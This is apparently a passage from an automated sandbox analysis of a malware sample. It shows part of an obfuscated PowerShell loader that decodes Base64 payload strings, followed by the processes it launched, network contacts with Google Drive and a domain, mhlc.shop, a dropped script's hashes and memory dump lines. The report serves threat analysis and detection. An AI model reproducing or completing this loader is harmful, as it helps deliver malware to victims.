$Seawalls;&($Fastlaast) (cangler 'TeleS evitRec,aHoerrAd itProc-ArguSBe,rlToveeF,gteFin.pAstr Excu5Hjti ');}&($Fastlaast) (cangler 'Squi$solbU FlanImbee arjxphartCr crM,shaCeravTiltaMyofgchona Tranvejrt evnlt,icy Wit P ov=Alau IlanGMarkeUntrtK,mm-NonzCEmuloBaadnUnsetL.pieTwisnNarrtRyde Fri,$An.lGdashbTu.taawe,k Glok peke trin Par ');&($Fastlaast) (cangler 'B.gg$TovfGS.ksa,ibifstalfSecrk Kony SataAsp.8H st4Sote euk=Fuld Har[Hi.pSArr,yTortsSn gtAfspeIr.emSbeu. Sj,C.lidoKohon Arav KipeB.ndr D ctUfor]Skaa:Knud: CypF EtyrUvurooverm upeB oua SttsIndveEnvi6 ili4RestSBrustUnprrBenhi Nonn.itog ,ke(Ane.$NocuUSolinsw,eeFriaxTetrtNoner.rosaB.pyvThe,a icgFo,oaColln G,ntArm.lPauly iss)Nokt ');&($Fastlaast) (cangler 'Scr,$R,teMPoseu kali ersr ArcbBroauEnvir.endnT an Resu= ato Col,[PrivSA.asyFalls SvmtTrameBailmF ag.Dr.gTTer.e TroxElastbleg. UryEPr enM,crc su,oPropdFngsiCompnIsotghumi] .in:Hugg:TripAvandSRombC,xymISascIHind.OptaGWeskeTitetTeknS.ejrtUnblrDiagiP ysnSadegAlmu(Citr$ InaG LapaForkfKrsef Chik estyFrogaFrik8Rows4 ,ab)Podd ');&($Fastlaast) (cangler ' Fl,$circSMilikReklnFlawhlatte DisdCheksPantpFreml BygeCountmisatDe,re Ldin imb=Fors$MythM ,ypuEctoim.dsrernabAstruToplrSvinnKonk.ReplsJagluWas.bUdt s A.ptFascr Prgi .atnCr.pgMyog(No.k3Atte2 Tit0 Uns7Diss0Burt9Asci, Ove3 Afl9Komm3Impe2Re,i3De,e) Enf ');&($Fastlaast) $Sknhedspletten;}"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3472 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | tcp | |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | mhlc.shop | udp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
| US | 8.8.8.8:53 | 20.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fu5ynqbe.pjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1132-13-0x0000025A68DB0000-0x0000025A68DD2000-memory.dmp
memory/1132-14-0x00007FFED26A0000-0x00007FFED3161000-memory.dmp
memory/1132-15-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/1132-16-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/1132-17-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/2624-18-0x0000000004BE0000-0x0000000004C16000-memory.dmp
memory/2624-19-0x00000000746C0000-0x0000000074E70000-memory.dmp
memory/2624-20-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/2624-21-0x0000000005250000-0x0000000005878000-memory.dmp
memory/2624-22-0x00000000051D0000-0x00000000051F2000-memory.dmp
memory/2624-23-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/2624-24-0x0000000005A60000-0x0000000005AC6000-memory.dmp
memory/2624-34-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/2624-35-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/2624-36-0x00000000061D0000-0x000000000621C000-memory.dmp
memory/2624-37-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/2624-38-0x0000000007370000-0x0000000007406000-memory.dmp
memory/2624-39-0x00000000066B0000-0x00000000066CA000-memory.dmp
memory/2624-40-0x0000000006730000-0x0000000006752000-memory.dmp
memory/2624-41-0x0000000007A30000-0x0000000007FD4000-memory.dmp
memory/2624-42-0x0000000008660000-0x0000000008CDA000-memory.dmp
memory/2624-43-0x0000000007830000-0x0000000007852000-memory.dmp
memory/2624-44-0x00000000078B0000-0x00000000078C4000-memory.dmp
memory/1132-45-0x00007FFED26A0000-0x00007FFED3161000-memory.dmp
memory/1132-46-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/1132-47-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/1132-48-0x0000025A68E50000-0x0000025A68E60000-memory.dmp
memory/2624-50-0x00000000746C0000-0x0000000074E70000-memory.dmp
memory/2624-51-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/2624-52-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/2624-53-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/2624-54-0x0000000007880000-0x0000000007881000-memory.dmp
memory/2624-55-0x0000000008CE0000-0x000000000E8A3000-memory.dmp
memory/2624-56-0x00000000770E1000-0x0000000077201000-memory.dmp
memory/4300-57-0x0000000077168000-0x0000000077169000-memory.dmp
memory/4300-58-0x00000000770E1000-0x0000000077201000-memory.dmp
memory/4300-71-0x0000000001210000-0x0000000002464000-memory.dmp
memory/4300-72-0x0000000000F60000-0x0000000000F87000-memory.dmp
memory/2624-73-0x00000000746C0000-0x0000000074E70000-memory.dmp
memory/1132-76-0x00007FFED26A0000-0x00007FFED3161000-memory.dmp
memory/4300-77-0x0000000001210000-0x0000000002464000-memory.dmp